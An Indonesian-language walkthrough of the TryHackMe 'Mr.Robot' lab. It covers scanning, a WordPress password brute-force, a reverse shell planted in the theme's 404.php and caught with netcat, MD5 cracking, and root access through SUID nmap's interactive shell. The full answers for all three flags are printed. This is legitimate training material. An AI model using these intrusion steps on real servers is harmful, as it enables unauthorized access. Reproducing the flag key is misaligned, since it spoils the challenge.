Mr.Robots CTF - TryHackMe Writeup, Indonesia
Heyyo ges selamat datang di postingan ini, kali ini gua bakal kasih writeup gua di CTF TryHackMe. Nah kali ini gua bakal mainin room nya Mr.Robots ges, okeh langsung ae simak.
Oke karna ini level medium jadi clue yang di kasih di soal cuma sedikit ges. Jadi kita harus cari cari sendiri clue di web nya.
# Enumeration
Okeh pertama kali gua scan nmap dlu kek biasa.
Command gua:
nmap -sV -sC -oN nmap.txt web-lu# Nmap 7.80 scan initiated Sat Oct 31 12:41:20 2020 as: nmap -sV -sC -oN nmap/initial 10.10.146.146
Nmap scan report for 10.10.146.146
Host is up (0.50s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 31 12:44:28 2020 -- 1 IP address (1 host up) scanned in 187.52 seconds Oke ges gua rasa disitu cuma dapet sedikit informasi aja. Gua lanjut pake gobuster buat scan directory.
Command gua :
gobuster dir -w /path/to/wordlist -x php,txt -u web-lu -o output-to-fileHasil :
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.117.75
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/10/31 14:34:25 Starting gobuster
===============================================================
/images (Status: 301)
/index.php (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/video (Status: 301)
/0 (Status: 301)
/feed (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/admin (Status: 301)
/robots (Status: 200)Oke disitu setelah gua cek satu satu di /robots ternyata ada isi yang berguna ges :v.
Okeh disitu gua nemu ada Dictionary sama flag ke 1 nya. kalian buka aja itu flag nya terus submit lalu download dictionary nya nanti kita bakal wpbf.
# Reverse Shell
Nah disini gua dapet username nya itu elliot. Jadi kita cuma Bruteforce password nya aja, Disini kalian bisa pake tools wpbf yang mana aja cari google banyak.
Hasil BF :
Oke disitu kita dapet password nya itu ER28-0652. Jadi gass aja login ke wp nya.
Nah dibagian edit, kita edit 404.php nya. Kalian tinggal pilih aja yang ada di kanan. cari 404 template. Nah di source nya kalian ganti pake revshell kalian. Kalian sesuai in aja.
Kalo udah klink update file. nanti bakal berhasil. Sebelum kalian akses 404 nya kalian listen netcat dulu.
Command netcat :
nc -lvnp port-yang-lu-set-di-revshellNah okeh terus kalian pangil aja revshell nya. Caranya? masukin aja
http://ipwebnya/ahuygfuyewfyetfgewufgwe
Hehe kasih aja terserah nanti bakal ke 404 not found
nah nanti bakal ke listen kalo benet set nya :v
Hasil:
/bin/sh: 0: can't access tty; job control turned off
Kalian harus pake pty di python buat turn on in. Itu harus di benerin kalau ga kalian gabakal bisa pake command "su, dll".
Okeh jadi command nya itu:
python -c "import pty; pty.spawn('/bin/bash')"Okeh jadi flag kedua itu ada di home dir nya user robot. jadi kalian masuk aja ke home dir nya robot di /home/robot. nah disana user permision nya cuma robot yang bisa read jadi kalau kita read bakal denied.
# Robot user
File kedua yang ada di home dir nya robot itu ada hash md5 yang harus kita crack.
daemon@linux:/home/robot$ cat password.raw-d5
robot:c3fcd3d76192e4007dfb496cca67e13b Nah disitu kita dapet md5 nya c3fcd3d76192e4007dfb496cca67e13b. Jadi kita crack aja. disini gua crack di
Okeh jadi disitu kita nemu pass dari user robot, bisa dilihat. OKeh selanjut nya kita login jadi robot pake command "su nama-user"
Nanti diminta passnya kita masukin pass diatas.Setelah itu kalian buka ae file flag ke 2 pake command cat.
# Privileges Escalation
Okeh jadi yang terakhir itu kita cek apakah ada privesc buat jadi root user. Jadi disini gua pake tools linpeas. Okeh buat download linpeas ke target itu kita pake wget aja.
1. pindah ke dir /dev/shm
cd /dev/shm2. Download linpeas
wget http://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh3. Chmod & jalanin
Okeh kita chmod file nya, kita tambah agar bisa di execute
chmod +x linpeas.shOkeh selanjutnya jalanin ae linpeas nya.
./linpeas.shOkeh kalo udah kalian tunggu ae sambil liat liat ada yang bisa apa ga :). Nah disini gua udah dapet vuln nya tuh ada di SUID Nmap.
Okeh langsung aja kita eksekusi vuln nya, ikuti langkah dibawah.
Pertama :
nmap --interactiveLalu setelah itu kalian ketik :
!shDan boom kalian akan menjadi user root :V
Okeh kalau udah gitu kalian pergi aja ke directory root. Disana ada flag ke 3, kalian cat aja seperti biasa.
# Ringkasan
1. What is key 1?
Answer -> 073403c8a58a1f80d943455fb30724b9
2. What is key 2?
Answer -> 822c73956184f694993bede3eb39f959
3. What id key 3?
Answer -> 04787ddef27c3dee1ee161b21670b4e4
OKeh sekian pembahasanya byee






